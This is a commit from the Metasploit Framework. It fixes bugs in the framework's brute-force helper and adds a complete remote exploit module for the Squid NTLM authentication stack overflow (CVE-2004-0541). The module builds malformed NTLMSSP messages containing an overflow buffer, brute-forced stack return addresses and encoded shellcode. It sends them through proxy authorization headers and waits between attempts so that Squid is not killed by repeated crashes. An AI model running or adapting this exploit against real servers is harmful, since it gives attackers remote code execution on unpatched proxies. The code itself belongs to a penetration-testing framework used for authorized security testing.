squid ntlm authenticate ported, fixed bugs in brute force mixni

git-svn-id: file:///home/svn/framework3/trunk@4192 4d416f70-5f16-0410-b530-b9f4589650da

lib/msf/core/exploit/brute.rb

@@ -23,8 +23,8 @@ module Exploit::Brute
 		#
 		register_advanced_options(
 			[
-				OptData.new('BruteWait', [ false, "Delay between brute force attempts"     ]),
-				OptData.new('BruteStep', [ false, "Step size between brute force attempts" ])
+				OptInt.new('BruteWait', [ false, "Delay between brute force attempts", 1     ]),
+				OptInt.new('BruteStep', [ false, "Step size between brute force attempts", 16 ])
 			], Msf::Exploit::Brute)
 	end
 
@@ -43,8 +43,8 @@ module Exploit::Brute
 			bf = target.bruteforce
 
 			# Get the start and stop address hashes
-			start = bf.start_addresses ? bf.start_address.dup : {}
-			stop  = bf.stop_addresses ? bf.stop_address.dup : {}
+			start = bf.start_addresses ? bf.start_addresses.dup : {}
+			stop  = bf.stop_addresses ? bf.stop_addresses.dup : {}
 			step  = bf.step_size
 			delay = bf.delay
 		
@@ -84,6 +84,16 @@ module Exploit::Brute
 			stopped = []
 			curr    = start.dup
 
+			# Automatically determine the step size based off the nop sled length
+			if step == 0
+				step = payload.nop_sled_size
+
+				if step == 0
+					raise OptionValidateError.new(['BruteStep']), "The step size for this exploit is invalid"
+				end
+			end
+
+
 			# Keep going until we run out of options
 			while (curr.length != stopped.length)
 
@@ -105,7 +115,7 @@ module Exploit::Brute
 
 					# Calculate the next address before we move it to see if
 					# we're going to go over
-					next_addr = step_size * direction[k]
+					next_addr = step * direction[k]
 
 					# If this item has hit a stop address, add it to the stopped 
 					# hash and move it no further

modules/exploits/linux/proxy/squid_ntlm_authenticate.rb

@@ -0,0 +1,139 @@
+require 'msf/core'
+
+module Msf
+
+class Exploits::Linux::Proxy::SquidNtlmAuthenticate < Msf::Exploit::Remote
+
+	include Exploit::Brute
+	include Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,	
+			'Name'           => 'Squid NTLM Authenticate Overflow',
+			'Description'    => %q{
+				This is an exploit for Squid's NTLM authenticate overflow
+				(libntlmssp.c). Due to improper bounds checking in
+				ntlm_check_auth, it is possible to overflow the 'pass'
+				variable on the stack with user controlled data of a user
+				defined length.  Props to iDEFENSE for the advisory.
+			},
+			'Author'         => 'skape',
+			'Version'        => '$Revision: 3110 $',
+			'References'     =>
+				[
+					[ 'OSVDB', '6791'],
+					[ 'URL', 'http://www.idefense.com/application/poi/display?id=107'],
+					[ 'CVE', '2004-0541'],
+					[ 'MIL', '67'],
+
+				],
+			'Privileged'     => false,
+			'Payload'        =>
+				{
+					'Space'    => 256,
+					'MinNops'  => 16,
+					'Prepend'  => "\x31\xc9\xf7\xe1\x8d\x58\x0e\xb0\x30\x41\xcd\x80",
+					'PrependEncoder' => "\x83\xec\x7f",
+
+				},
+			'Targets'        => 
+				[
+					[ 'Linux Bruteforce', 
+						{ 
+							'Platform'   => 'linux', 
+							'Bruteforce' => 
+								{
+									'Start' => { 'Ret' => 0xbfffcfbc, 'Valid' => 0xbfffcf9c },
+									'Stop'  => { 'Ret' => 0xbffffffc, 'Valid' => 0xbffffffc },
+									'Step'  => 0
+								}
+						}, 
+					],
+				],
+			'DisclosureDate' => 'Jun 8 2004',
+			'DefaultTarget'  => 0))
+
+		register_advanced_options(
+			[
+				# We must wait 15 seconds between each attempt so as to prevent
+				# squid from exiting completely after 5 crashes.
+				OptInt.new('BruteWait', [ false, "Delay between brute force attempts", 15 ]),
+			], self.class)
+	end
+
+	def brute_exploit(addresses)
+		site = "http://" + rand_text_english(rand(128)) + ".com"
+
+		print_status("Trying #{"%.8x" % addresses['Ret']}...")
+
+		connect('global' => true)
+
+		trasnmit_negotiate(site)
+		transmit_authenticate(site, addresses)
+
+		handler
+		disconnect
+	end
+
+	def trasnmit_negotiate(site)
+		negotiate  = 
+			"NTLMSSP\x00"        + # NTLMSSP identifier
+			"\x01\x00\x00\x00"   + # NTLMSSP_NEGOTIATE
+			"\x07\x00\xb2\x07"   + # flags
+			"\x01\x00\x09\x00"   + # workgroup len/max       (1)
+			"\x01\x00\x00\x00"   + # workgroup offset        (1)
+			"\x01\x00\x03\x00"   + # workstation len/max     (1)
+			"\x01\x00\x00\x00"     # workstation offset      (1)
+
+		print_status("Sending NTLMSSP_NEGOTIATE (#{negotiate.length} bytes)")
+
+		request = client.request(
+			'uri'     => site,
+			'headers' =>
+				{
+					'Proxy-Connection' => 'Keep-Alive',
+					'Proxy-Authorization' => 'NTLM ' + Base64.encode64(negotiate)
+				})
+
+		client.send_request(request, 5)
+	end
+
+	def transmit_authenticate(site, addresses)
+		overflow     = 
+			rand_text_alphanumeric(0x20) + 
+			[addresses['Ret']].pack('V') + 
+			[addresses['Valid']].pack('V') + 
+			"\xff\x00\x00\x00"
+		shellcode    = payload.encoded
+		pass_len     = [overflow.length + shellcode.length].pack('v')
+		authenticate =
+			"NTLMSSP\x00"        + # NTLMSSP identifier
+			"\x03\x00\x00\x00"   + # NTLMSSP_AUTHENTICATE
+			pass_len + pass_len  + # lanman response len/max
+			"\x38\x00\x00\x00"   + # lanman response offset  (56)
+			"\x01\x00\x01\x00"   + # nt response len/max     (1)
+			"\x01\x00\x00\x00"   + # nt response offset      (1)
+			"\x01\x00\x01\x00"   + # domain name len/max     (1)
+			"\x01\x00\x00\x00"   + # domain name offset      (1)
+			"\x01\x00\x01\x00"   + # user name               (1)
+			"\x01\x00\x00\x00"   + # user name offset        (1)
+			"\x00\x00\x00\x00"   + # session key
+			"\x8b\x00\x00\x00"   + # session key
+			"\x06\x82\x00\x02"   + # flags
+			overflow + shellcode
+
+		print_status("Sending NTLMSSP_AUTHENTICATE (#{authenticate.length} bytes)")
+
+		request = client.request(
+			'uri'     => site,
+			'headers' =>
+				{
+					'Proxy-Connection' => 'Keep-Alive',
+					'Proxy-Authorization' => 'NTLM ' + Base64.encode64(authenticate)
+				})
+
+		client.send_request(request, 5)
+	end
+
+end
+end